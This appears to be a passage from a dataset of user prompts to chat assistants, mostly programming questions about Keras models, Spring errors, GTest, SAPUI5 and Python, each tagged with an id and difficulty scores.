6 input_shape = (6427,)
8 inputs = Input(shape=input_shape)
---> 10 model = Sequential([
11 Dense(6427, activation='relu', input_shape = inputs),
12 Dropout(0.25),
13 Dense(3200, activation='relu'),
14 Dropout(0.20),
15 Dense(1800, activation='relu'),
16 Dropout(0.15),
17 Dense(1024, activation='relu'),
18 Dropout(0.10),
19 Dense(512, activation='relu'),
20 Dropout(0.05),
21 Dense(256, activation='relu'),
22 Dense(128, activation='relu'),
23 Dense(64, activation='relu'),
24 Dense(32, activation='relu')
25 ])
27 model.compile(optimizer='adam',
28 loss='mse', # Use Mean Squared Error for regression
29 metrics=['mae']) # Mean Absolute Error as an additional metric
30 return model
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\keras\\src\\models\\sequential.py:73, in Sequential.__init__(self, layers, trainable, name)
71 if layers:
72 for layer in layers:
---> 73 self.add(layer, rebuild=False)
74 self._maybe_rebuild()
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\keras\\src\\models\\sequential.py:86, in Sequential.add(self, layer, rebuild)
84 if not self._layers:
85 if getattr(layer, \"_input_shape_arg\", None) is not None:
---> 86 self.add(InputLayer(shape=layer._input_shape_arg))
88 # If we are passed a Keras tensor created by keras.Input(), we
89 # extract the input layer from its keras history and use that.
90 if hasattr(layer, \"_keras_history\"):
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\keras\\src\\layers\\core\\input_layer.py:46, in InputLayer.__init__(self, shape, batch_size, dtype, sparse, batch_shape, input_tensor, name, **kwargs)
43 raise ValueError(\"You must pass a `shape` argument.\")
45 if shape is not None:
---> 46 shape = backend.standardize_shape(shape)
47 batch_shape = (batch_size,) + shape
48 self.batch_shape = tuple(batch_shape)
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\keras\\src\\backend\\common\\variables.py:510, in standardize_shape(shape)
506 if isinstance(shape, tf.TensorShape):
507 # `tf.TensorShape` may contain `Dimension` objects.
508 # We need to convert the items in it to either int or `None`
509 shape = shape.as_list()
--> 510 shape = tuple(shape)
512 if config.backend() == \"torch\":
513 # `shape` might be `torch.Size`. We need to convert the items in it to
514 # either int or `None`
515 shape = tuple(map(lambda x: int(x) if x is not None else None, shape))
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\keras\\src\\backend\\common\\keras_tensor.py:120, in KerasTensor.__iter__(self)
119 def __iter__(self):
--> 120 raise NotImplementedError(
121 \"Iterating over a symbolic KerasTensor is not supported.\"
122 )
NotImplementedError: Iterating over a symbolic KerasTensor is not supported."
}
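A minimal sketch of the likely fix: input_shape expects a shape tuple, not the KerasTensor returned by Input(...), so either pass the tuple directly or start the Sequential model with an Input layer.
from tensorflow.keras import Sequential
from tensorflow.keras.layers import Input, Dense, Dropout

model = Sequential([
    Input(shape=(6427,)),            # a shape tuple, not a KerasTensor
    Dense(6427, activation='relu'),
    Dropout(0.25),
    # ... remaining Dense/Dropout layers unchanged ...
    Dense(32, activation='relu'),
])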
|
be8e31cd98cf29b6ae560562787799e7
|
{
"intermediate": 0.3306133449077606,
"beginner": 0.43303394317626953,
"expert": 0.23635269701480865
}
|
46,777
|
`when 🏳️ clicked`
`🖊️ erase all`
`set a to 149597870.7`
`set e to 0.7`
`set ν to 92`
`set ω to 76`
`set Zoom to 2000000`
`set Mass to 1.98847e30`
`set t to 1`
`set RO to 0`
`🖊️ set pen color to #FFFFFF`
`🖊️ set pen size to 1`
`🖊️ pen up`
`forever`
`{`
`_set r to {a * (1 - e^2) / (1 + (e * cos of (ν)))}`
`_set X to {r * cos of (ν + ω)}`
`_set Y to {r * sin of (ν + ω)}`
`_go to x: {X / Zoom} y: {Y / Zoom}`
`_🖊️ pen down`
`}`
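For reference, the loop traces the polar-form conic orbit equation r = a(1 - e^2) / (1 + e cos ν), with true anomaly ν and argument of periapsis ω, then plots x = r cos(ν + ω) and y = r sin(ν + ω), scaled down by Zoom before drawing.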
|
ed3f91c5cdc0bf8668f2c8bce8b049bc
|
{
"intermediate": 0.2755393981933594,
"beginner": 0.30851060152053833,
"expert": 0.41594991087913513
}
|
46,778
|
Make it a one-liner:
for session, session_info in sessions.items():
if session_info['posts sent']:
length_with_posts+=1
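One possible one-liner, assuming length_with_posts should simply count the sessions with posts sent:
length_with_posts = sum(1 for info in sessions.values() if info['posts sent'])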
|
89e4b481eb8aaf8459097708477abd20
|
{
"intermediate": 0.4210500121116638,
"beginner": 0.29917940497398376,
"expert": 0.2797706127166748
}
|
46,779
|
Make it a one-liner:
for session, session_info in sessions.items():
if session_info['posts sent']:
length_with_posts+=1
|
b5a69b1412ce955b31baa7a946a1a69d
|
{
"intermediate": 0.27735060453414917,
"beginner": 0.5434809923171997,
"expert": 0.17916841804981232
}
|
46,780
|
What is the problem? Caused by: java.lang.IllegalStateException: Ambiguous handler methods mapped for HTTP path 'http://localhost:8080/acq-company-web/': {public java.lang.String com.ncs.company.web.controller.IndexController.showIndex(org.springframework.ui.Model,org.springframework.security.core.Authentication,javax.servlet.http.HttpServletRequest), public java.lang.String com.ncs.company.web.controller.IndexControllerNew.showIndex(org.springframework.ui.Model,org.springframework.security.core.Authentication,javax.servlet.http.HttpServletRequest)}
at deployment.acq-company-web.war//org.springframework.web.servlet.handler.AbstractHandlerMethodMapping.lookupHandlerMethod(AbstractHandlerMethodMapping.java:367)
at deployment.acq-company-web.war//org.springframework.web.servlet.handler.AbstractHandlerMethodMapping.getHandlerInternal(AbstractHandlerMethodMapping.java:314)
at deployment.acq-company-web.war//org.springframework.web.servlet.handler.AbstractHandlerMethodMapping.getHandlerInternal(AbstractHandlerMethodMapping.java:61)
at deployment.acq-company-web.war//org.springframework.web.servlet.handler.AbstractHandlerMapping.getHandler(AbstractHandlerMapping.java:352)
at deployment.acq-company-web.war//org.springframework.web.servlet.DispatcherServlet.getHandler(DispatcherServlet.java:1160)
at deployment.acq-company-web.war//org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:940)
at deployment.acq-company-web.war//org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:901)
at deployment.acq-company-web.war//org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:970)
... 91 more
|
37e482cd0cd5b728dc81d1c26adc40be
|
{
"intermediate": 0.4754568934440613,
"beginner": 0.2788739800453186,
"expert": 0.2456691563129425
}
|
46,781
|
""START:Please modify the code correctly."에서 "END:Please modify the code correctly."까지의 코드 중 이상한 부분을 수정해주세요."를 영작해줘.
|
bb7f10a9504c11824bf0763f7dc4eac7
|
{
"intermediate": 0.27752795815467834,
"beginner": 0.31940561532974243,
"expert": 0.4030664265155792
}
|
46,782
|
I have the following code:
# %%
import pandas as pd
import numpy as np
from tensorflow import keras
from sklearn.preprocessing import StandardScaler
def data_generator(file_path, batch_size):
chunksize = batch_size
while True: # Loop forever, so the generator never terminates
for chunk in pd.read_csv(file_path, chunksize=chunksize):
# Assuming your CSV has headers that match features/targets
# Normalizing the features
filtered_c = chunk.drop(['Date', 'Symbol'], axis=1)
feature_data = filtered_c.drop([
'y_High_1d', 'y_Low_1d', 'y_Priority_1d',
'y_High_2d', 'y_Low_2d', 'y_Priority_2d',
'y_High_3d', 'y_Low_3d', 'y_Priority_3d',
'y_High_5d', 'y_Low_5d', 'y_Priority_5d'], axis=1)
target_data = filtered_c[['y_High_1d'
, 'y_Low_1d', 'y_Priority_1d',
'y_High_2d', 'y_Low_2d', 'y_Priority_2d',
'y_High_3d', 'y_Low_3d', 'y_Priority_3d',
'y_High_5d', 'y_Low_5d', 'y_Priority_5d'
]]
scaler = StandardScaler()
feature_data_scaled = pd.DataFrame(scaler.fit_transform(feature_data), columns=feature_data.columns)
# Assuming target_data also needs to be scaled, apply scaler separately
target_data_scaled = pd.DataFrame(scaler.fit_transform(target_data), columns=target_data.columns)
# Now, feature_data_scaled and target_data_scaled are both DataFrames, scaled and ready to use
yield feature_data_scaled.values, target_data_scaled.values
# %%
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout, Input
import tensorflow as tf
def build_model():
input_shape = (6427,)
model = Sequential([
Dense(6427, activation='relu', input_shape = input_shape),
Dropout(0.25),
Dense(3200, activation='relu'),
Dropout(0.20),
Dense(1800, activation='relu'),
Dropout(0.15),
Dense(1024, activation='relu'),
Dropout(0.10),
Dense(512, activation='relu'),
Dropout(0.05),
Dense(256, activation='relu'),
Dense(128, activation='relu'),
Dense(64, activation='relu'),
Dense(32, activation='relu'),
Dense(12),
])
model.compile(optimizer='adam',
loss='mse', # Use Mean Squared Error for regression
metrics=['mae']) # Mean Absolute Error as an additional metric
return model
# %%
file_path = r"C:\Users\arisa\Desktop\combined_day.csv"
batch_size = 128
# Instantiate the model
model = build_model()
model.summary()
# %%
# Setup the data generator
train_generator = data_generator(file_path,batch_size)
# Assuming you know or calculate the total number of rows in advance
total_samples = 1000000 # Example number, replace with your dataset's size
steps_per_epoch = total_samples // batch_size
# Train the model
model.fit(train_generator, steps_per_epoch=1000, epochs=10)
Update it so it splits the data into train and validation sets and uses them to train the model.
|
af9914ad18c9fdbf888e5c0953cef746
|
{
"intermediate": 0.36976394057273865,
"beginner": 0.3796335458755493,
"expert": 0.25060248374938965
}
|
46,783
|
Create a GTest unit-test case with GMock for the code below:
static int updateDisplay(void){
int ret = false;
switch (getDisplay())
{
case eHomeDisplay :
sprintf(cluster_screen.disp_name,currentDisplay);
cluster_screen.width = m_parameterInfo[eHomeDisplay].width;
cluster_screen.height = m_parameterInfo[eHomeDisplay].height;
break;
case eWideDisplay :
sprintf(cluster_screen.disp_name,currentDisplay);
cluster_screen.width = m_parameterInfo[eWideDisplay].width;
cluster_screen.height = m_parameterInfo[eWideDisplay].height;
break;
case eDesktopDisplay :
sprintf(cluster_screen.disp_name,currentDisplay);
cluster_screen.width = m_parameterInfo[eDesktopDisplay].width;
cluster_screen.height = m_parameterInfo[eDesktopDisplay].height;
break;
default:
break;
}
ret = true;
return ret;
}
|
0277698c6a0b388ac2c38b1fc7badf30
|
{
"intermediate": 0.3739706575870514,
"beginner": 0.40253937244415283,
"expert": 0.22348996996879578
}
|
46,784
|
Hi there, please act as a senior SAPUI5 developer and answer my question with working code examples.
|
e29eeff8381727d2f7914d53c1d10b4b
|
{
"intermediate": 0.4024829566478729,
"beginner": 0.2911725640296936,
"expert": 0.3063444495201111
}
|
46,785
|
package com.mns.oms.batch.listener;
import com.mns.oms.batch.domain.JobStatistics;
import com.mns.oms.batch.mapper.CycleAvoidingMappingContext;
import com.mns.oms.batch.mapper.StepDataMapper;
import com.mns.oms.batch.model.JobStepDetails;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.batch.core.BatchStatus;
import org.springframework.batch.core.JobExecution;
import org.springframework.batch.core.listener.JobExecutionListenerSupport;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.data.mongodb.core.MongoTemplate;
import org.springframework.stereotype.Component;
import java.io.File;
import java.time.ZoneId;
import java.util.ArrayList;
import java.util.List;
/**
* @author Mrinmoy Mandal
*
* Module: WISMR
*
*/
@Component
public class JobStatusNotificationListener extends JobExecutionListenerSupport {
private static final Logger log = LoggerFactory.getLogger(JobStatusNotificationListener.class);
private JobStatistics jobStats;
private List<JobStepDetails> stepExecList;
private List<String> fileList;
@Autowired
MongoTemplate mongoTemplate;
@Override
public void beforeJob(JobExecution jobExecution) {
if (jobExecution.getStatus() == BatchStatus.STARTED) {
log.debug("JobExecution object--> {}", jobExecution);
log.info("<----------------------------JOB - {} STARTED with job id: {}--------------------------------------->",
jobExecution.getJobInstance().getJobName(), jobExecution.getJobInstance().getId());
log.debug("mongoTemplate template---->{}", mongoTemplate);
}
}
@Override
public void afterJob(JobExecution jobExecution) {
saveJobStatisticsData(jobExecution);
if (jobExecution.getStatus() == BatchStatus.COMPLETED) {
log.info("<----------------------------JOB - {} FINISHED with job id: {}--------------------------------------->",
jobExecution.getJobInstance().getJobName(), jobExecution.getJobInstance().getId());
}
}
/**
* This method will be used to save job statistics data.
*
* @param jobExecution
*/
private void saveJobStatisticsData(JobExecution jobExecution) {
jobStats = new JobStatistics();
stepExecList = new ArrayList<>();
fileList = new ArrayList<>();
jobStats.setJobId(jobExecution.getJobInstance().getId());
jobStats.setJobName(jobExecution.getJobInstance().getJobName());
jobStats.setStartTime(jobExecution.getStartTime().toInstant().atZone(ZoneId.systemDefault()).toLocalDateTime());
jobStats.setEndTime(jobExecution.getEndTime().toInstant().atZone(ZoneId.systemDefault()).toLocalDateTime());
jobStats.setJobStatus(jobExecution.getStatus().toString());
jobStats.setJobExitStatus(jobExecution.getExitStatus().getExitCode().toString());
jobStats.setJobExitDescription(jobExecution.getExitStatus().getExitDescription().toString());
jobStats.setLastModifieDate(
jobExecution.getLastUpdated().toInstant().atZone(ZoneId.systemDefault()).toLocalDateTime());
jobStats.setCreatedDate(
jobExecution.getCreateTime().toInstant().atZone(ZoneId.systemDefault()).toLocalDateTime());
jobExecution.getStepExecutions().forEach(stepExec -> {
log.debug("Step exec context------> {}", stepExec.getExecutionContext());
JobStepDetails stepDetails = StepDataMapper.INSTANCE.getStepDetails(stepExec,
new CycleAvoidingMappingContext());
stepExecList.add(stepDetails);
log.debug("File List---> {}", fileList);
if (stepExec.getExecutionContext().containsKey("fileName")) {
fileList.add(new File(stepExec.getExecutionContext().getString("fileName")).getName());
}
});
log.debug("JobExecution object--> {}", jobExecution);
log.debug("JobExecutionstep exec object--> {}", jobExecution.getStepExecutions());
log.debug("JobExecution job inst object--> {}", jobExecution.getJobInstance());
log.debug("JobExecution job exec context object--> {}", jobExecution.getExecutionContext());
jobStats.setFileList(fileList);
jobStats.setStepDetails(stepExecList);
log.debug("Job Statistics to be saved in DB-----> {}", jobStats);
mongoTemplate.save(jobStats);
}
}
This is the issue: "method toInstant in interface java.time.chrono.ChronoLocalDateTime<D> cannot be applied to given types". Explain and fix.
|
c12965afec41938d148c41098a97db0f
|
{
"intermediate": 0.2681535482406616,
"beginner": 0.4390513002872467,
"expert": 0.2927951514720917
}
|
46,786
|
I have the following code:
# %%
import pandas as pd
import numpy as np
from tensorflow import keras
from sklearn.preprocessing import StandardScaler
def data_generator(file_path, batch_size, data_type):
chunksize = batch_size
total_rows = 301617 # Adjust with your dataset's actual number of rows
split_ratio = 0.92 # 92% for train, 8% for validation
train_rows = int(total_rows * split_ratio)
while True: # Loop forever, so the generator never terminates
row_counter = 0 # reset each pass; used below to split train and validation rows (was undefined)
for chunk in pd.read_csv(file_path, chunksize=chunksize):
if data_type == 'train' and row_counter >= train_rows:
continue # Skip the rest if we are fetching training data but have reached the end of the train set
elif data_type == 'val' and row_counter < train_rows:
row_counter += len(chunk)
continue # Skip this chunk if we are fetching validation data but are still in the train range
# Assuming your CSV has headers that match features/targets
# Normalizing the features
filtered_c = chunk.drop(['Date', 'Symbol'], axis=1)
feature_data = filtered_c.drop([
'y_High_1d', 'y_Low_1d', 'y_Priority_1d',
'y_High_2d', 'y_Low_2d', 'y_Priority_2d',
'y_High_3d', 'y_Low_3d', 'y_Priority_3d',
'y_High_5d', 'y_Low_5d', 'y_Priority_5d'], axis=1)
target_data = filtered_c[['y_High_1d'
, 'y_Low_1d', 'y_Priority_1d',
'y_High_2d', 'y_Low_2d', 'y_Priority_2d',
'y_High_3d', 'y_Low_3d', 'y_Priority_3d',
'y_High_5d', 'y_Low_5d', 'y_Priority_5d'
]]
scaler = StandardScaler()
feature_data_scaled = pd.DataFrame(scaler.fit_transform(feature_data), columns=feature_data.columns)
# Assuming target_data also needs to be scaled, apply scaler separately
target_data_scaled = pd.DataFrame(scaler.fit_transform(target_data), columns=target_data.columns)
# Now, feature_data_scaled and target_data_scaled are both DataFrames, scaled and ready to use
yield feature_data_scaled.values, target_data_scaled.values
row_counter += len(chunk)
# %%
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout, Input
import tensorflow as tf
def build_model():
input_shape = (6427,)
model = Sequential([
Dense(6427, activation='relu', input_shape = input_shape),
Dropout(0.25),
Dense(3200, activation='relu'),
Dropout(0.20),
Dense(1800, activation='relu'),
Dropout(0.15),
Dense(1024, activation='relu'),
Dropout(0.10),
Dense(512, activation='relu'),
Dropout(0.05),
Dense(256, activation='relu'),
Dense(128, activation='relu'),
Dense(64, activation='relu'),
Dense(32, activation='relu'),
Dense(12),
])
model.compile(optimizer='adam',
loss='mse', # Use Mean Squared Error for regression
metrics=['mae']) # Mean Absolute Error as an additional metric
return model
# %%
file_path = r"C:\Users\arisa\Desktop\combined_day.csv"
batch_size = 128
# Instantiate the model
model = build_model()
model.summary()
# %%
train_generator = data_generator(file_path, batch_size, 'train')
val_generator = data_generator(file_path, batch_size, 'val')
total_samples = 301617 # Assuming same example size
train_samples = int(total_samples * 0.92)
val_samples = total_samples - train_samples
steps_per_epoch = train_samples // batch_size
validation_steps = val_samples // batch_size
# Modify the model fitting call to include validation data
model.fit(
train_generator,
steps_per_epoch=steps_per_epoch,
epochs=100,
validation_data=val_generator,
validation_steps=validation_steps
)
# %%
# Setup the data generator
train_generator = data_generator(file_path,batch_size)
# Assuming you know or calculate the total number of rows in advance
total_samples = 301617 # Example number, replace with your dataset's size
steps_per_epoch = total_samples // batch_size
# Train the model
model.fit(train_generator, steps_per_epoch=1000, epochs=10)
# %%
import tensorflow as tf
if tf.test.gpu_device_name():
print('Default GPU Device: {}'.format(tf.test.gpu_device_name()))
else:
print('Please install GPU version of TF')
Is there a way I can use one global StandardScaler for my dataset instead of creating a new StandardScaler for each chunk? Which approach is recommended?
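A sketch of one common approach, assuming an extra preliminary pass over the file is acceptable: fit a single global scaler incrementally with StandardScaler.partial_fit, then reuse it (transform only) inside the generator instead of calling fit_transform per chunk, so every batch shares the same statistics.
from sklearn.preprocessing import StandardScaler
import pandas as pd

feature_scaler = StandardScaler()
# First pass: accumulate the global mean/variance chunk by chunk
# (drop the target columns here too if features get their own scaler).
for chunk in pd.read_csv(file_path, chunksize=10000):
    feats = chunk.drop(['Date', 'Symbol'], axis=1)
    feature_scaler.partial_fit(feats)
# Inside data_generator, replace scaler.fit_transform(...) with
# feature_scaler.transform(...).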
|
9eeca25900d19ece0b3d2466702291d1
|
{
"intermediate": 0.46519041061401367,
"beginner": 0.3712368309497833,
"expert": 0.16357272863388062
}
|